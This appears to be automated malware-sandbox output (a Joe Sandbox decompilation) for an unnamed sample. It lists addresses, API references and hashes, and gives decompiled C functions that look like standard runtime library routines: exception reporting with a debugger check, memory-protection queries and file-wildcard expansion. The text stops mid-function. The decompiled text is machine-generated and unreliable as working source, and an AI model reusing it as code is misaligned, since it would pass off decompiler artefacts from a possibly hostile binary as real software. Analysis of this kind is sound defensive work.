0x00a330da
0x00000000
0x00a330da
0x00a33005
0x00a32d69
0x00a32d6b
0x00a32d70
0x00a32d74
0x00a32d76
0x00a32d83
0x00a32d85
0x00000000
0x00a32d85
0x00a32d78
0x00a32d7b
0x00000000
0x00000000
0x00a32d7d
0x00000000
0x00a32d7f
0x00000000
0x00a32d44
0x00a32d3d
0x00a32cf4
0x00a32cf6
0x00000000
0x00000000
0x00a32cf8
0x00a32cfa
0x00a32cfc
0x00a32cfc
0x00000000
0x00a32ca0
0x00a32ca0
0x00a32ca0
0x00a32ca3
0x00a32cd9
0x00000000
0x00a32cd9
0x00a32ca6
0x00a32ca6
0x00a32ca9
0x00a32ccd
0x00000000
0x00a32ccd
0x00a32cab
0x00a32cab
0x00a32cae
0x00a32cc1
0x00a32cc1
0x00000000
0x00a32cc1
0x00a32cb0
0x00a32cb3
0x00000000
0x00000000
0x00a32cb5
0x00000000
0x00a32cb5
0x00a32c9e
0x00a32ba2
0x00a32ba4
0x00a32ba6
0x00000000
0x00000000
0x00000000
0x00a32ba6
0x00a32b81
0x00a32b83
0x00000000
0x00000000
0x00a32b85
0x00a32b88
0x00000000
0x00a32b88
0x00a32a4b
0x00a32a4b
0x00a32a4e
0x00000000
0x00000000
0x00a32a55
0x00a32a58
0x00a32a8c
0x00a32a93
0x00a32a9b
0x00a32aa3
0x00a32ab2
0x00a32aba
0x00a32abd
0x00a32ac3
0x00a32ac9
0x00a32acf
0x00a32ad1
0x00a32adb
0x00a32adb
0x00a32ae1
0x00a32ae8
0x00a32af6
0x00a32af9
0x00a32aff
0x00a32aff
0x00000000
0x00a32a5a
0x00a32a5a
0x00a32a64
0x00a32a72
0x00a32a78
0x00a32a78
0x00000000
0x00a32a64
0x00a32a58
0x00a329e7
0x00a329ea
0x00a329fa
0x00a329fa
0x00000000
0x00a329fa
0x00a329ec
0x00a329f3
0x00000000
0x00000000
0x00000000
0x00a329f3
0x00a329a5
0x00a329a5
0x00a329a8
0x00a329c5
0x00a329cb
0x00000000
0x00a329cb
0x00a329aa
0x00a329aa
0x00a329ad
0x00a329b8
0x00a329ba
0x00a329ba
0x00a329bb
0x00a329c1
0x00000000
0x00a329c1
0x00a329af
0x00a329b2
0x00000000
0x00a329b4
0x00a329b4
0x00000000
0x00a329b4
0x00a3298f
0x00a32991
0x00000000
0x00a32991
0x00a3298d
0x00a328af
0x00a328b1
0x00a328b3
0x00a328b9
0x00000000
0x00a328c5
0x00a328c7
0x00a328cb
0x00a328dd
0x00a328ea
0x00a32908
0x00a32919
0x00a3291e
0x00000000
0x00a3291e
0x00000000
0x00a328ea

APIs

__EH_prolog.LIBCMT ref: 00A32874
_strlen.LIBCMT ref: 00A32E3F

Part of subcall function 00A402BA: __EH_prolog.LIBCMT ref: 00A402BF

Part of subcall function 00A41B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A3BAE9,00000000,?,?,?,0001041E), ref: 00A41BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A32F91

Strings

CMT, xrefs: 00A32FBC

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 2376ccad9f9a31ef14d8e16059124a1d7e4e6d11dbaa6ae3301f90e6c2f8ab64
Instruction ID: 746a665997bd235c972322ab041fd536360d0586bee03fd3774d52e43ea1a265
Opcode Fuzzy Hash: 2376ccad9f9a31ef14d8e16059124a1d7e4e6d11dbaa6ae3301f90e6c2f8ab64
Instruction Fuzzy Hash: 0662F3726003448FDF19DF78C9867EA7BA1AF54300F08857EFC9A9B282DB759945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A4F838 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00A4F838(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00A4FA46(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00A4FFF0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00A4FFF0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00A4FA46(_t49);
				}
				return _t49;
			}

0x00a4f838
0x00a4f838
0x00a4f838
0x00a4f84c
0x00a4f84e
0x00a4f851
0x00a4f851
0x00a4f855
0x00a4f85a
0x00a4f872
0x00a4f878
0x00a4f87e
0x00a4f884
0x00a4f88a
0x00a4f890
0x00a4f896
0x00a4f89d
0x00a4f8a4
0x00a4f8ab
0x00a4f8b2
0x00a4f8b9
0x00a4f8c0
0x00a4f8c1
0x00a4f8ca
0x00a4f8d0
0x00a4f8d3
0x00a4f8d9
0x00a4f8e8
0x00a4f8f4
0x00a4f8ff
0x00a4f906
0x00a4f90d
0x00a4f918
0x00a4f920
0x00a4f929
0x00a4f92b
0x00a4f92e
0x00a4f930
0x00a4f93a
0x00a4f942
0x00a4f948
0x00000000
0x00a4f94f
0x00a4f952

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A4F844
IsDebuggerPresent.KERNEL32 ref: 00A4F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A4F930
UnhandledExceptionFilter.KERNEL32(?), ref: 00A4F93A

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 8b52ceb9acb2fabc1a7dd23682e3a33473893241c57f558fee0d4c5c0a51a834
Instruction ID: 4e29ae1d37e84260bccc895dbe619f785d07f61ef87d657ffc615055d1af166f
Opcode Fuzzy Hash: 8b52ceb9acb2fabc1a7dd23682e3a33473893241c57f558fee0d4c5c0a51a834
Instruction Fuzzy Hash: 48312779D052199FDF20DFA4D989BCCBBB8AF08304F1051AAE50CAB250EB759B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00A4E6A3(signed int _a4, signed int _a8) {
				struct _MEMORY_BASIC_INFORMATION _v32;
				struct _SYSTEM_INFO _v68;
				long _t20;
				signed int _t28;
				void* _t30;
				signed int _t32;
				signed int _t40;
				signed int _t45;

				_t20 = VirtualQuery(_a4,  &_v32, 0x1c);
				if(_t20 == 0) {
					_push(0x19);
					asm("int 0x29");
				}
				if((_v32.Protect & 0x00000044) != 0) {
					GetSystemInfo( &_v68);
					_t40 = _v68.dwPageSize;
					_t32 = _t40 - 1;
					_t45 =  !_t32 & _a4;
					_t28 = _a8 / _t40;
					_t30 = ((_t32 & _a4) + _t40 + (_t32 & _a8) - 1) / _t40 + _t28;
					if(_t30 == 0) {
						L5:
						return _t28;
					} else {
						goto L4;
					}
					do {
						L4:
						_t28 = 0;
						asm("lock or [esi], eax");
						_t45 = _t45 + _t40;
						_t30 = _t30 - 1;
					} while (_t30 != 0);
					goto L5;
				}
				return _t20;
			}

0x00a4e6b4
0x00a4e6bc
0x00a4e6be
0x00a4e6c1
0x00a4e6c1
0x00a4e6c7
0x00a4e6cf
0x00a4e6d5
0x00a4e6d8
0x00a4e6ea
0x00a4e6fa
0x00a4e6fc
0x00a4e6fe
0x00a4e70c
0x00000000
0x00000000
0x00000000
0x00000000
0x00a4e700
0x00a4e700
0x00a4e700
0x00a4e702
0x00a4e705
0x00a4e707
0x00a4e707
0x00000000
0x00a4e700
0x00a4e70f

APIs

VirtualQuery.KERNEL32(80000000,00A4E5E8,0000001C,00A4E7DD,00000000,?,?,?,?,?,?,?,00A4E5E8,00000004,00A91CEC,00A4E86D), ref: 00A4E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00A4E5E8,00000004,00A91CEC,00A4E86D), ref: 00A4E6CF

Strings

D, xrefs: 00A4E6C3

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: fb414d6d7d04d0dc1acd6993a3c52bfcfcd92eac36ebdf40d7077fa44f3544e7
Instruction ID: 8dbe957ae30b0959922652fbeb494c3cfff3a2777c5dd4e6829c0a953d3be647
Opcode Fuzzy Hash: fb414d6d7d04d0dc1acd6993a3c52bfcfcd92eac36ebdf40d7077fa44f3544e7
Instruction Fuzzy Hash: 8401D476600109ABDF14DF69DC09AED7BAABFC4328F0CC220ED19D6150D734D9068680

Uniqueness

Uniqueness Score: -1.00%

Function 00A58EBD Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E00A58EBD(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xa6e7ac; // 0xa7a040ce
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00A4FA46(_t41);
					_pop(_t61);
				}
				E00A4FFF0(_t66,  &_v804, 0, 0x50);
				E00A4FFF0(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x7
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -805
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00A4FA46(_t57);
				}
				return E00A4FBBC(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00a58ebd
0x00a58ebd
0x00a58ebd
0x00a58ec8
0x00a58ecd
0x00a58ecf
0x00a58ed7
0x00a58ed9
0x00a58edc
0x00a58ee1
0x00a58ee1
0x00a58eed
0x00a58f00
0x00a58f0e
0x00a58f14
0x00a58f1a
0x00a58f20
0x00a58f26
0x00a58f2c
0x00a58f32
0x00a58f38
0x00a58f3e
0x00a58f44
0x00a58f4b
0x00a58f52
0x00a58f59
0x00a58f60
0x00a58f67
0x00a58f6e
0x00a58f6f
0x00a58f78
0x00a58f7e
0x00a58f7e
0x00a58f81
0x00a58f87
0x00a58f94
0x00a58f9d
0x00a58fa6
0x00a58faf
0x00a58fbd
0x00a58fbf
0x00a58fc5
0x00a58fd4
0x00a58fe0
0x00a58fe3
0x00a58fe8
0x00a58ff7

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A58FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A58FBF
UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00A58FCC

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 4338143c6e98b3e3749b4cff3defaf48c5826f12ac8120be8a66141e58de61bb
Instruction ID: 745609769d7f124d44f9601d0493a7aec45804988d0c0c77cb231fa96ea45d7b
Opcode Fuzzy Hash: 4338143c6e98b3e3749b4cff3defaf48c5826f12ac8120be8a66141e58de61bb
Instruction Fuzzy Hash: E731D8759012189BCF21DF68DD8979CBBB4BF48311F5041EAE81CA7250EB749F858F54

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00A5B348(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				void* _t79;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				signed int _t103;
				union _FINDEX_INFO_LEVELS _t104;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t111;
				void* _t112;
				signed int _t116;
				void* _t117;
				signed int _t118;
				void* _t119;
				void* _t120;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_t103 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t103) {
					_t5 = _t103 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t109 = E00A5B136(_t84, _t77, 1);
					_t86 = _t108;
					__eflags = _t103;
					if(_t103 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t103;
						_t40 = E00A5F101(_t86, _t109 + _t103, _t77, _a4);
						_t118 = _t117 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E00A5B587(_a16, _t100, __eflags, _t109);
							E00A58DCC(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t103);
						_t74 = E00A5F101(_t86, _t109, _t77, _a8);
						_t118 = _t117 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00A59097();
							asm("int3");
							_t116 = _t118;
							_t119 = _t118 - 0x150;
							_t43 =  *0xa6e7ac; // 0xa7a040ce
							_v48 = _t43 ^ _t116;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t109);
							_t110 = _v332.cAlternateFileName;
							_push(_t103);
							_v372 = _t110;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E00A5F150(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t104 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E00A4FFF0(_t104,  &_v332, _t104, 0x140);
								_t120 = _t119 + 0xc;
								_t111 = FindFirstFileExA(_t78, _t104,  &_v332, _t104, _t104, _t104);
								_t55 = _v336;
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00A5B348(_t92,  &(_v332.cFileName), _t78, _v340);
											_t120 = _t120 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t111,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t101 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E00A56310(_t78, _t101 + _t95 * 4, _t65 - _t95, 4, E00A5B1A0);
									}
								} else {
									_push(_t55);
									_t57 = E00A5B348(_t89, _t78, _t104, _t104);
									L26:
									_t104 = _t57;
								}
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									FindClose(_t111);
								}
								_t58 = _t104;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t110);
									_t58 = E00A5B348(_t87, _t78, 0, 0);
								}
							}
							_pop(_t105);
							_pop(_t112);
							__eflags = _v12 ^ _t116;
							_pop(_t79);
							return E00A4FBBC(_t58, _t79, _v12 ^ _t116, _t101, _t105, _t112);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}

0x00a5b34d
0x00a5b34e
0x00a5b351
0x00a5b351
0x00a5b354
0x00a5b354
0x00a5b356
0x00a5b357
0x00a5b361
0x00a5b364
0x00a5b367
0x00a5b36c
0x00a5b375
0x00a5b378
0x00a5b382
0x00a5b385
0x00a5b386
0x00a5b388
0x00a5b39c
0x00a5b39c
0x00a5b39f
0x00a5b3a9
0x00a5b3ae
0x00a5b3b1
0x00a5b3b3
0x00000000
0x00a5b3b5
0x00a5b3b9
0x00a5b3c2
0x00a5b3c8
0x00000000
0x00a5b3cb
0x00a5b38a
0x00a5b38a
0x00a5b390
0x00a5b395
0x00a5b398
0x00a5b39a
0x00a5b3d1
0x00a5b3d3
0x00a5b3d4
0x00a5b3d5
0x00a5b3d6
0x00a5b3d7
0x00a5b3d8
0x00a5b3dd
0x00a5b3e1
0x00a5b3e3
0x00a5b3e9
0x00a5b3f0
0x00a5b3f3
0x00a5b3f6
0x00a5b3f7
0x00a5b3fa
0x00a5b3fb
0x00a5b3fe
0x00a5b3ff
0x00a5b420
0x00a5b420
0x00a5b422
0x00000000
0x00000000
0x00a5b407
0x00a5b409
0x00a5b40b
0x00a5b40d
0x00a5b40f
0x00a5b411
0x00a5b413
0x00a5b41e
0x00000000
0x00a5b41e
0x00a5b413
0x00a5b40f
0x00000000
0x00a5b40b
0x00a5b424
0x00a5b426
0x00a5b429
0x00a5b442
0x00a5b442
0x00a5b444
0x00a5b447
0x00a5b457
0x00a5b459
0x00a5b459
0x00a5b449
0x00a5b449
0x00a5b44c
0x00000000
0x00a5b44e
0x00a5b44e
0x00a5b451
0x00000000
0x00a5b453
0x00a5b453
0x00a5b453
0x00a5b451
0x00a5b44c
0x00a5b45f
0x00a5b467
0x00a5b46b
0x00a5b479
0x00a5b47e
0x00a5b493
0x00a5b495
0x00a5b49b
0x00a5b49e
0x00a5b4d0
0x00a5b4d0
0x00a5b4d2
0x00a5b4d5
0x00a5b4db
0x00a5b4db
0x00a5b4e2
0x00a5b4fc
0x00a5b4fc
0x00a5b50b
0x00a5b510
0x00a5b513
0x00a5b515
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5b4e4
0x00a5b4e4
0x00a5b4ea
0x00a5b4ec
0x00000000
0x00a5b4ee
0x00a5b4ee
0x00a5b4f1
0x00000000
0x00a5b4f3
0x00a5b4f3
0x00a5b4fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5b4fa
0x00a5b4f1
0x00a5b4ec
0x00000000
0x00a5b517
0x00a5b51f
0x00a5b525
0x00a5b527
0x00a5b527
0x00a5b52f
0x00a5b534
0x00a5b53c
0x00a5b53f
0x00a5b541
0x00a5b555
0x00a5b55a
0x00a5b4a0
0x00a5b4a0
0x00a5b4a4
0x00a5b4ac
0x00a5b4ac
0x00a5b4ac
0x00a5b4ae
0x00a5b4b1
0x00a5b4b4
0x00a5b4b4
0x00a5b4ba
0x00a5b42b
0x00a5b42e
0x00a5b430
0x00000000
0x00a5b432
0x00a5b432
0x00a5b438
0x00a5b43d
0x00a5b430
0x00a5b4bf
0x00a5b4c0
0x00a5b4c1
0x00a5b4c3
0x00a5b4cc
0x00000000
0x00000000
0x00000000
0x00a5b39a
0x00a5b36e
0x00a5b370
0x00a5b3cc
0x00a5b3d0
0x00a5b3d0
0x00000000

Strings

., xrefs: 00A5B4DB

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 5bc2e1b5091143fd9449a5befd2cf39c1db0e94aadb204e1ec60e6391bf9998c
Instruction ID: b0bf4e00688d7e5c27d247f3cc7a9d63810f19320e9c3f7a20c68e9882c5c1b4
Opcode Fuzzy Hash: 5bc2e1b5091143fd9449a5befd2cf39c1db0e94aadb204e1ec60e6391bf9998c
Instruction Fuzzy Hash: 8731E171910249AFCB24DF78CC84EFB7BBDEB85316F1401A8E91997252E6309E498B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A5D440 Relevance: 3.5, APIs: 2, Instructions: 464
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 90%

			E00A5D440(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
